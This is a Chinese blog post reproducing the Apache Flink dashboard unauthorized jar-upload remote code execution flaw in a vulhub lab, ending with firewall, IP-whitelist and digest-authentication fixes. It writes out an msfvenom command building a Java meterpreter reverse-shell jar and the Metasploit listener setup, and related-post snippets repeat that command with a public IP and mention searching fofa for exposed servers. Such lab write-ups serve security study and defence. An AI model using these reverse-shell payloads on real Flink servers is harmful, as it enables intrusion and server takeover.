Apache Flink漏洞复现(未授权访问&上传jar包getshell)

最新推荐文章于 2024-07-04 15:40:50 发布
最新推荐文章于 2024-07-04 15:40:50 发布
阅读量4.3k 收藏 5
点赞数 2
文章标签: flink docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43244584/article/details/113183578
版权

Apache Flink漏洞复现(未授权访问&上传jar包getshell)

一、Flink简介

Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。

二、漏洞介绍

​ Apache Flink Dashboard默认没有用户权限认证

​ 攻击者可以通过未授权的Flink Dashboard控制台

​ 直接上传木马jar包

​ 可远程执行任意系统命令获取服务器权限

三、影响范围

​ Apache Flink <= 1.9.1

四、环境搭建

使用vulhub进行安装

​ Vulhub地址:

​ https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518

进入目录

cd vulhub-master/flink/CVE-2020-17518

安装环境

docker-compose up -d

五、漏洞检测

1、访问ip:8081

在这里插入图片描述
2、利用msfovenom生成rce.jar

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.0.131 LPORT=4444 -f jar > rce.jar

3、配置msf监听

use exploit/multi/handler 
set payload java/shell/reverse_tcp 
set LHOST 192.168.0.131
set LPORT 4444 
show options 
run

4、在Submit New Job处上传rec.jar文件,点击submit
在这里插入图片描述

5.成功getshell

在这里插入图片描述

六、修复建议

针对Apache Flink Dashboard 设置防火墙策略

禁止Dashboard对外访问或确保只对可信端点开放

仅允许白名单IP进行访问

并在Web代理中增加对该服务的Digest认证

防止未授权访问

关于认证设置可参考链接:

https://httpd.apache.org/docs/2.4/mod/mod_auth_digest.html

参考文章:

https://mp.weixin.qq.com/s/ASRGJJmxpMgNmFoSZoWhfQ

Grace¥¥¥
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache Flink 授权远程代码执行提权(实战)
失心少年
12-04 1214
1、fofa 搜索 app=“Apache-Flink” 可以看到有上千个 2、生成木马 下面展示一些 。 msfvenom -p java/meterpreter/reverse_tcp LHOST=47.103.79.70 LPORT=4444 -f jar > rce.jar 3、打开msf 进行如下配置,并进行监听 下面展示一些 。 3、上传刚才生成的木马,并执行 4、看到shell已经反弹回来 5、通过id 、 whoami 、cat /etc/passwd等命令查看当前用户及权
漏洞修复】修复 Apache Flink Web Dashboard 授权访问致远程命令执行漏洞
RobinWang的博客
01-15 7759
漏洞修复】修复 Apache Flink Web Dashboard 授权访问致远程命令执行漏洞 介绍 攻击者通过Flink Web Dashboard上传含有恶意代码的jar包进行攻击,中招会使服务器占满CPU沦为挖矿机,非常猖獗 通过反编译得到的恶意代码: package com.example; import java.io.IOException; public class Mai...
【CVE】CVE-2020-17518 & CVE-2020-17519:Flink 任意文件上传 & 授权访问
边扯边淡
05-09 2541
起序:漏扫完看报告的时候发现的,复现学习一下。 一、靶场环境 使用的是 github 上的 vulhub 环境。因为 Flink 中的 CVE-2020-17518 和 CVE-2020-17519 在 Flink/1.11.2 版本都存在。 vulhub:https://github.com/vulhub/vulhub 1、漏洞描述:任意文件上传 & 授权访问 CVE 编号 名称 危害 CVE-2020-17518 任意文件上传 应用系统在文件上传功能处对用户上传.
Apache Flink授权访问-远程代码命令执行-复现
thelostworld
10-24 619
​好久没更新了,今天趁1024更新一篇,最近工作中遇到这个漏洞,今天自己来做一下这个漏洞复现Apache Flink授权访问-远程代码命令执行-复现一、漏洞简介Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过授权Flink Dashboard控制台,直接上传木马jar包,可远程执行任意系统命令获取服务器权限,风险极大。二、影响版本Apache Flink &...
Apache Flink 授权访问+远程代码执行
Adminxe的博客
11-12 1027
0x00 前言 @Adminxe 今天胖胖表哥突然扔来一个复现,那俺得瞧瞧,正好写个博客划划水,然后就引发了下面一些列的操作以及你想看到的,以及和你不想看到的文字。之前就有大佬复现过,毕竟水文和复现学习,那就来一波吧!最可恶的是,今天的MC兄没有请客喝啵啵奶茶,必须点名批评一下! 从现在fofa的搜索量来看,基本也就是国内Apache Flink 存在1500左右的站点。 有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围: <= 1.9.1(最..
gitee 上传jar包_【Apache Flink漏洞复现授权访问&上传jar包getshell
weixin_29820757的博客
01-18 540
漏洞介绍Apache Flink Dashboard默认没有用户权限认证攻击者可以通过授权Flink Dashboard控制台直接上传木马jar包可远程执行任意系统命令获取服务器权限二影响范围Apache Flink <= 1.9.1三漏洞检测正文fofa搜索:app="Apache Flink"默认端口为8081poc.pyimport sysimport jsonimpo...
Apache Flink 任意Jar包上传漏洞复现
潜心学安全的小白
11-15 925
目录漏洞背景漏洞描述影响版本漏洞复现环境搭建漏洞利用修复建议参考链接 漏洞背景 近日,有研究员公开了Apache Flink授权上传jar包的安全风险,攻击者利用该隐患可在授权的情况下,上传包含恶意代码的jar包,从而控制目标服务器。 漏洞描述 Apache Flink是开源流处理框架,可用于对流数据进行分布式处理,在大数据领域中应用广泛。jar包上传属于Flink的正常业务功能,但是Fli...
Apache-flink 授权访问任意jar包上传反弹shell.MD
04-12
Apache-flink 授权访问任意jar包上传反弹shell
Apache Flink 授权访问+远程代码执行.pdf
04-30
Apache Flink 授权访问+远程代码执行.pdf,该漏洞可以上传任意Jar包导致远程代码执行
flink1.14.3 cdc jar包
03-13
Flink 1.14.3 CDC (Change Data Capture) jar 包集合是用于实时数据流处理的一个关键组件,尤其在大数据领域,它扮演着捕捉数据库变化并将其转化为可操作流的角色。以下是对这些jar包及其相关的技术进行的详细解释:...
[漏洞复现]Apache Flink授权访问+远程代码命令执行
cj_Hydra's Blog
10-24 2594
前言: 近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围:<= 1.9.1(最新版本) 但是作者通过测试在版本Version: 1.11.2也是受影响的,此次复现就是通过版本Version: 1.11.2进行复现利用。 漏洞复现: 首先通过msfveon生成jar包,命令: msfvenom -p java/meterpreter/reverse_tcp LHOST=公网IP地址 LPORT=监听端口 -f jar > rce.jar 然
Apache Flink 授权远程代码执行检查
weixin_42299610的博客
06-07 1778
Apache Flink 授权远程代码执行检查
getshellApache Flink 授权访问+远程代码执行
MoCoCN的博客
11-12 821
@[MoCo](getshellApache Flink 授权访问+远程代码执行) 0x00前言 又是领导不在的一天,今天兄弟们就是天,随着工作的时间越来越久对知识的渴望也越来越强大,最近几天在看反弹shell的一些文章,也学习到了一些反弹shell技巧和姿势,由于环境的问题,暂不能记录文本,虽说都是一些基本的吧,慢慢来嘛,看着文章,吐槽的国内某知名的培训机构,努力的汲取知识,看着看着就累了,有点看不动了,但是还是想学,于是决定去看看adminxe大佬的博客上看看有没有发布新的文章,看见大佬昨天发布了一
flink
zyzn1425077119的博客
10-29 185
参考:https://blog.csdn.net/lp284558195/article/details/92798595 https://baike.baidu.com/item/flink/9078426?fr=aladdin Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。 ...
flinkdashboard授权
someInNeed的博客
10-16 1297
访问 http://172.16.150.xx:8084。然后目录在/usr/local/nginx。flinkwebui 增加账号密码。添加配置完成以后,重启nginx,修改flink.conf。配置nginx.conf。
流批一体计算引擎-13-[Flink]RuntimeExecutionMode和水印策略Watermark Strategy
最新发布
qq_20466211的博客
07-04 1616
flink中的水印策略
Apache Flink 任意 JAR 包上传漏洞利用及防范策略
weixin_43822401的博客
07-04 708
漏洞主要影响配置不当的 Apache Flink 集群,允许攻击者通过 Web 界面上传恶意 JAR 包,执行远程代码。Apache Flink 的任意 JAR 包上传漏洞是一个严重的安全隐患,需要立即采取措施进行修复。通过本文提供的分析和防范策略,可以帮助管理员和开发人员保护他们的 Flink 集群不受此漏洞的影响,确保大数据环境的安全性。本文提供的案例和方法仅用于教学目的,实际操作时应确保遵守相关法律法规,不应用于非法侵入或攻击他人系统。
apache flink文件上传漏洞修复
05-20
Apache Flink是一个分布式流处理框架,从版本1.0.0到1.4.0存在文件上传漏洞,攻击者可以通过该漏洞上传恶意文件并在服务器上执行任意代码,造成严重的安全风险。以下是修复该漏洞的步骤: 1.升级Apache Flink版本至1.4.1及以上版本,因为该版本已经修复了文件上传漏洞。 2.移除flink-runtime-web模块,因为该模块是漏洞的根源。可以通过修改pom.xml文件中的依赖关系来实现该操作。 3.禁用Flink的Web UI界面,因为该界面是攻击者上传恶意文件的入口。可以通过修改conf/flink-conf.yaml文件中的配置来实现该操作,具体内容如下: ``` #disable flink web ui web.submit.enable: false ``` 4.限制Flink集群的访问权限,防止授权的用户上传恶意文件。可以通过修改conf/flink-conf.yaml文件中的配置来实现该操作,具体内容如下: ``` #set flink rest api host and port rest.address: 127.0.0.1 rest.port: 8081 #set flink jobmanager rpc address and port jobmanager.rpc.address: 127.0.0.1 jobmanager.rpc.port: 6123 ``` 以上是修复Apache Flink文件上传漏洞的步骤,建议尽快采取措施以保证系统安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值